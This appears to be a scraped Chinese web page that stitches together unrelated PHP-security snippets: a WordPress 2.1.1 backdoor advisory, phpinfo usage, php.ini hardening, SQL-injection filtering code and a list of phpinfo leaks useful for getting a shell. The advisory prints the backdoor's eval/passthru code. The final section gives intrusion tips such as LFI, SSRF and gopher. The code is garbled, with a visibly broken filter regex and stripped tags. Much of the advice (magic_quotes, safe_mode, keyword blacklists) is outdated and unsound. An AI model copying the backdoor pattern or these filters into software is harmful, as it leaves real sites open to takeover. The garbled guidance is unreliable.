文章大纲：

• 1、Wordpress 2.1.1远程命令执行后门漏洞
• 2、phpinfo怎么用
• 3、如何在PHP中阻止SQL注入？
• 4、phpinfo这是什么文件?
• 5、http://localhost/phpinfo.php变空白页
• 6、从phpinfo中能获取哪些敏感信息

Wordpress 2.1.1远程命令执行后门漏洞

他受影响系统是：

WordPress WordPress 2.1.1

描述：

BUGTRAQ ID: 22797

WordPress是一款免费的论坛Blog系统。

WordPress提供软件下载的网站被入侵，入侵者修改了软件代码码植入远程可执行命令的后门，远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。

被修改的文件是wp-includes/feed.php和wp-includes/theme.php，被添加了如下代码：

在wp-includes/feed.php文件中：

function comment_text_phpfilter($filterdata) {

eval($filterdata);

}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

eval()调用会执行通过ix变量传入的PHP代码。

在wp-includes/theme.php文件中：

function get_theme_mcommand($mcds) {

passthru($mcds);

}

...

if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

passthru()会执行通过iz变量传入的PHP代码。

*来源：Ivan Fratric

链接：

*

测试 *** ：

--------------------------------------------------------------------------------

提示：

以下程序( *** )可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

phpinfo怎么用

显示PHP的当前信息,其中包括PHP扩展和编译版本,服务器信息和环境,PHP环境中,路径,主机和本地配置选项,HTTP头,PHP许可等等（详细信息可参考PHP手册）。要得到这些信息，不仅可以从浏览器中查看，还可以使用命令行在服务器上查看。

使用浏览器查看很简单，:只需要在网站目录创建一个PHP文件，使用上面提到的phpinfo()函数，如：

1：?php

2：phpinfo();

3：?

然互在浏览器中输入此文件路径即可查看。

在Linux服务器上，还可以使用如下命令，不用浏览网页同样可以查看PHP信息，如：

php -r 'phpinfo();'

此命令同样可以得到网页形式的结果。

扩展资料：

phpinfo使用说明：

bool phpinfo ([ int$what = INFO_ALL ] )

输出 PHP 当前状态的大量信息，包含了 PHP 编译选项、启用的扩展、PHP 版本、服务器信息和环境变量（如果编译为一个模块的话）、PHP环境变量、操作系统版本信息、path 变量、配置选项的本地值和主值、HTTP 头和PHP授权信息(License)。

因为每个系统安装得有所不同， phpinfo() 常用于在系统上检查 配置设置和 预定义变量。

phpinfo() 同时是个很有价值的、包含所有 EGPCS(Environment, GET, POST, Cookie, Server) 数据的调试工具。

参考资料来源：百度百科-phpinfo

如何在PHP中阻止SQL注入？

【一、在服务器端配置】

安全，PHP代码编写是一方面，PHP的配置更是非常关键。

我们php手手工安装的，php的默认配置文件在 /usr/local/apache2/conf/php.ini，我们最主要就是要配置php.ini中的内容，让我们执行 php能够更安全。整个PHP中的安全设置主要是为了防止phpshell和SQL Injection的攻击，一下我们慢慢探讨。我们先使用任何编辑工具打开 /etc/local/apache2/conf/php.ini，如果你是采用其他方式安装，配置文件可能不在该目录。

(1) 打开php的安全模式

php的安全模式是个非常重要的内嵌的安全机制，能够控制一些php中的函数，比如system()，

同时把很多文件操作函数进行了权限控制，也不允许对某些关键文件的文件，比如/etc/passwd，

但是默认的php.ini是没有打开安全模式的，我们把它打开：

safe_mode = on

(2) 用户组安全

当safe_mode打开时，safe_mode_gid被关闭，那么php脚本能够对文件进行访问，而且相同

组的用户也能够对文件进行访问。

建议设置为：

safe_mode_gid = off

如果不进行设置，可能我们无法对我们服务器网站目录下的文件进行操作了，比如我们需要

对文件进行操作的时候。

(3) 安全模式下执行程序主目录

如果安全模式打开了，但是却是要执行某些程序的时候，可以指定要执行程序的主目录：

safe_mode_exec_dir = D:/usr/bin

一般情况下是不需要执行什么程序的，所以推荐不要执行系统程序目录，可以指向一个目录，

然后把需要执行的程序拷贝过去，比如：

safe_mode_exec_dir = D:/tmp/cmd

但是，我更推荐不要执行任何程序，那么就可以指向我们网页目录：

safe_mode_exec_dir = D:/usr/www

(4) 安全模式下包含文件

如果要在安全模式下包含某些公共文件，那么就修改一下选项：

safe_mode_include_dir = D:/usr/www/include/

其实一般php脚本中包含文件都是在程序自己已经写好了，这个可以根据具体需要设置。

(5) 控制php脚本能访问的目录

使用open_basedir选项能够控制PHP脚本只能访问指定的目录，这样能够避免PHP脚本访问

不应该访问的文件，一定程度上限制了phpshell的危害，我们一般可以设置为只能访问网站目录：

open_basedir = D:/usr/www

(6) 关闭危险函数

如果打开了安全模式，那么函数禁止是可以不需要的，但是我们为了安全还是考虑进去。比如，

我们觉得不希望执行包括system()等在那的能够执行命令的php函数，或者能够查看php信息的

phpinfo()等函数，那么我们就可以禁止它们：

disable_functions = system,passthru,exec,shell_exec,popen,phpinfo

如果你要禁止任何文件和目录的操作，那么可以关闭很多文件操作

disable_functions = chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir, rmdir,rename,file,file_get_contents,fputs,fwrite,chgrp,chmod,chown

以上只是列了部分不叫常用的文件处理函数，你也可以把上面执行命令函数和这个函数结合，

就能够 *** 大部分的phpshell了。

(7) 关闭PHP版本信息在http头中的泄漏

我们为了防止黑客获取服务器中php版本的信息，可以关闭该信息斜路在http头中：

expose_php = Off

比如黑客在 telnet 80 的时候，那么将无法看到PHP的信息。

(8) 关闭注册全局变量

在PHP中提交的变量，包括使用POST或者GET提交的变量，都将自动注册为全局变量，能够直接访问，

这是对服务器非常不安全的，所以我们不能让它注册为全局变量，就把注册全局变量选项关闭：

register_globals = Off

当然，如果这样设置了，那么获取对应变量的时候就要采用合理方式，比如获取GET提交的变量var，

那么就要用$_GET['var']来进行获取，这个php程序员要注意。

(9) 打开magic_quotes_gpc来防止SQL注入

SQL注入是非常危险的问题，小则网站后台被入侵，重则整个服务器沦陷，

所以一定要小心。php.ini中有一个设置：

magic_quotes_gpc = Off

这个默认是关闭的，如果它打开后将自动把用户提交对sql的查询进行转换，

比如把 ' 转为 \'等，这对防止sql注射有重大作用。所以我们推荐设置为：

magic_quotes_gpc = On

(10) 错误信息控制

一般php在没有连接到数据库或者其他情况下会有提示错误，一般错误信息中会包含php脚本当

前的路径信息或者查询的SQL语句等信息，这类信息提供给黑客后，是不安全的，所以一般服务器建议禁止错误提示：

display_errors = Off

如果你却是是要显示错误信息，一定要设置显示错误的级别，比如只显示警告以上的信息：

error_reporting = E_WARNING E_ERROR

当然，我还是建议关闭错误提示。

(11) 错误日志

建议在关闭display_errors后能够把错误信息记录下来，便于查找服务器运行的原因：

log_errors = On

同时也要设置错误日志存放的目录，建议根apache的日志存在一起：

error_log = D:/usr/local/apache2/logs/php_error.log

注意：给文件必须允许apache用户的和组具有写的权限。

MYSQL的降权运行

新建立一个用户比如mysqlstart

net user mysqlstart *** microsoft /add

net localgroup users mysqlstart /del

不属于任何组

如果MYSQL装在d:\mysql ，那么，给 mysqlstart 完全控制 的权限

然后在系统服务中设置，MYSQL的服务属性，在登录属性当中，选择此用户 mysqlstart 然后输入密码，确定。

重新启动 MYSQL服务，然后MYSQL就运行在低权限下了。

如果是在windos平台下搭建的apache我们还需要注意一点，apache默认运行是system权限，

这很恐怖，这让人感觉很不爽.那我们就给apache降降权限吧。

net user apache *** microsoft /add

net localgroup users apache /del

ok.我们建立了一个不属于任何组的用户apche。

我们打开计算机管理器，选服务，点apache服务的属性，我们选择log on，选择this account，我们填入上面所建立的账户和密码，

重启apache服务，ok，apache运行在低权限下了。

实际上我们还可以通过设置各个文件夹的权限，来让apache用户只能执行我们想让它能干的事情，给每一个目录建立一个单独能读写的用户。

这也是当前很多虚拟主机提供商的流行配置 *** 哦，不过这种 *** 用于防止这里就显的有点大材小用了。

【二、在PHP代码编写】

虽然国内很多PHP程序员仍在依靠addslashes防止SQL注入，还是建议大家加强中文防止SQL注入的检查。addslashes的问题在于黑客可以用0xbf27来代替单引号，而addslashes只是将0xbf27修改为0xbf5c27，成为一个有效的多字节字符，其中的0xbf5c仍会被看作是单引号，所以addslashes无法成功拦截。

当然addslashes也不是毫无用处，它是用于单字节字符串的处理，多字节字符还是用mysql_real_escape_string吧。

另外对于php手册中get_magic_quotes_gpc的举例：

if (!get_magic_quotes_gpc()) {

$lastname = addslashes($_POST[‘lastname’]);

} else {

$lastname = $_POST[‘lastname’];

}

更好对magic_quotes_gpc已经开放的情况下，还是对$_POST[’lastname’]进行检查一下。

再说下mysql_real_escape_string和mysql_escape_string这2个函数的区别：

mysql_real_escape_string 必须在(PHP 4 = 4.3.0, PHP 5)的情况下才能使用。否则只能用 mysql_escape_string ，两者的区别是：mysql_real_escape_string 考虑到连接的

当前字符集，而mysql_escape_string 不考虑。

总结一下：

* addslashes() 是强行加\；

* mysql_real_escape_string() 会判断字符集，但是对PHP版本有要求；

* mysql_escape_string不考虑连接的当前字符集。

-------------------------------------------------------------------------------------------------

在PHP编码的时候，如果考虑到一些比较基本的安全问题，首先一点：

1. 初始化你的变量

为什么这么说呢？我们看下面的代码：

PHP代码

?php

if ($admin)

{

echo '登陆成功！';

include('admin.php');

}

else

{

echo '你不是管理员，无法进行管理！';

}

?

好，我们看上面的代码好像是能正常运行，没有问题，那么加入我提交一个非法的参数过去呢，那么效果会如何呢？比如我们的这个页是，那么我们提交：，呵呵，你想一些，我们是不是直接就是管理员了，直接进行管理。

当然，可能我们不会犯这么简单错的错误，那么一些很隐秘的错误也可能导致这个问题，比如phpwind论坛有个漏洞，导致能够直接拿到管理员权限，就是因为有个$skin变量没有初始化，导致了后面一系列问题。那么我们如何避免上面的问题呢？首先，从php.ini入手，把php.ini里面的register_global =off，就是不是所有的注册变量为全局，那么就能避免了。但是，我们不是服务器管理员，只能从代码上改进了，那么我们如何改进上面的代码呢？我们改写如下：

PHP代码

?php

$admin = 0; // 初始化变量

if ($_POST['admin_user'] $_POST['admin_pass'])

{

// 判断提交的管理员用户名和密码是不是对的相应的处理代码

// ...

$admin = 1;

}

else

{

$admin = 0;

}

if ($admin)

{

echo '登陆成功！';

include('admin.php');

}

else

{

echo '你不是管理员，无法进行管理！';

}

?

那么这时候你再提交就不好使了，因为我们在一开始就把变量初始化为 $admin = 0 了，那么你就无法通过这个漏洞获取管理员权限。

2. 防止SQL Injection (sql注射)

SQL 注射应该是目前程序危害更大的了，包括最早从asp到php，基本上都是国内这两年流行的技术，基本原理就是通过对提交变量的不过滤形成注入点然后使恶意用户能够提交一些sql查询语句，导致重要数据被窃取、数据丢失或者损坏，或者被入侵到后台管理。

那么我们既然了解了基本的注射入侵的方式，那么我们如何去防范呢？这个就应该我们从代码去入手了。

我们知道Web上提交数据有两种方式，一种是get、一种是post，那么很多常见的sql注射就是从get方式入手的，而且注射的语句里面一定是包含一些sql语句的，因为没有sql语句，那么如何进行，sql语句有四大句：select 、update、delete、insert，那么我们如果在我们提交的数据中进行过滤是不是能够避免这些问题呢？

于是我们使用正则就构建如下函数：

PHP代码

?php

function inject_check($sql_str)

{

return eregi('select|insert|update|delete|'|

function verify_id($id=null)

{

if (!$id) { exit('没有提交参数！'); } // 是否为空判断

elseif (inject_check($id)) { exit('提交的参数非法！'); } // 注射判断

elseif (!is_numeric($id)) { exit('提交的参数非法！'); } // 数字判断

$id = intval($id); // 整型化

return $id;

}

?

呵呵，那么我们就能够进行校验了，于是我们上面的程序代码就变成了下面的：

PHP代码

?php

if (inject_check($_GET['id']))

{

exit('你提交的数据非法，请检查后重新提交！');

}

else

{

$id = verify_id($_GET['id']); // 这里引用了我们的过滤函数，对$id进行过滤

echo '提交的数据合法，请继续！';

}

?

好，问题到这里似乎都解决了，但是我们有没有考虑过post提交的数据，大批量的数据呢？

比如一些字符可能会对数据库造成危害，比如 ' _ ', ' %'，这些字符都有特殊意义，那么我们如果进行控制呢？还有一点，就是当我们的php.ini里面的magic_quotes_gpc = off的时候，那么提交的不符合数据库规则的数据都是不会自动在前面加' '的，那么我们要控制这些问题，于是构建如下函数：

PHP代码

?php

function str_check( $str )

{

if (!get_magic_quotes_gpc()) // 判断magic_quotes_gpc是否打开

{

$str = addslashes($str); // 进行过滤

}

$str = str_replace("_", "\_", $str); // 把 '_'过滤掉

$str = str_replace("%", "\%", $str); // 把' % '过滤掉

return $str;

}

?

我们又一次的避免了服务器被沦陷的危险。

最后，再考虑提交一些大批量数据的情况，比如发贴，或者写文章、新闻，我们需要一些函数来帮我们过滤和进行转换，再上面函数的基础上，我们构建如下函数：

PHP代码

?php

function post_check($post)

{

if (!get_magic_quotes_gpc()) // 判断magic_quotes_gpc是否为打开

{

$post = addslashes($post); // 进行magic_quotes_gpc没有打开的情况对提交数据的过滤

}

$post = str_replace("_", "\_", $post); // 把 '_'过滤掉

$post = str_replace("%", "\%", $post); // 把' % '过滤掉

$post = nl2br($post); // 回车转换

$post= htmlspecialchars($post); // html标记转换

return $post;

}

?

呵呵，基本到这里，我们把一些情况都说了一遍，其实我觉得自己讲的东西还很少，至少我才只讲了两方面，再整个安全中是很少的内容了，考虑下一次讲更多，包括php安全配置，apache安全等等，让我们的安全正的是一个整体，作到最安全。

最后在告诉你上面表达的：1. 初始化你的变量 2. 一定记得要过滤你的变量

phpinfo这是什么文件?

远程服务器，找到AppServ文件夹下的www（网站根目录）文件夹，删除phpinfo.php即可。

删除后，并不会为网站造成什么影响滴哦。

删除后，记得重启下apache。

请采纳！

http://localhost/phpinfo.php变空白页

你打开phpinfo.php看里边有代码没？是不是没有echo 啊？

第二个问题，你本地电脑也不会有什么安全问题的。XP系统还是很安全的。。

从phpinfo中能获取哪些敏感信息

一、绝对路径(_SERVER[“SCRIPT_FILENAME”])

这个是最常用，也是最有效的一个办法，找到phpinfo()页面可以直接找到网站的绝对路径，对于写shell和信息搜集是必不可少的。

二、支持的程序

可以通过phpinfo()查看一些特殊的程序服务，比如redis、memcache、mysql、 *** TP、curl等等如果服务器装了redis或者memcache可以通过ssrf来getshell了，在discuz中都出现过此类问题。如果确定装了redis或memcache的话，在没有思路的情况下，可以着重找一下ssrf

三、泄漏真实ip（_SERVER[“SERVER_ADDR”]或SERVER_ADDR）

有时候通过phpinfo()泄漏的ip可以查查旁站、c段什么的，直接无视cdn，百事不灵。

四、GOPHER

也算是ssrf一部分吧，或者说主要靠ssrf利用起来，如果支持gopher，ssrf便没有压力咯

五、fastcgi

查看是否开启fastcgi和fastcgi的版本，可能导致解析漏洞、远程命令执行、任意文件读取等问题

六、泄漏缓存文件地址（_FILES[“file1”]）

向phpinfo（） post一个shell可以在_FILES[“file1”]中看到上传的临时文件，如果有个lfi，便可以直接getshell了。

七、一些敏感配置

allow_url_include、allow_url_fopen、disable_functions、open_basedir、short_open_tag等等

比如allow_url_include可用来远程文件包含、disable_functions用来查看禁用函数，绕过执行、查看是否开启open_basedir，用p牛的绕过open_basedir的 *** 有可能能读一些没权限的目录等等。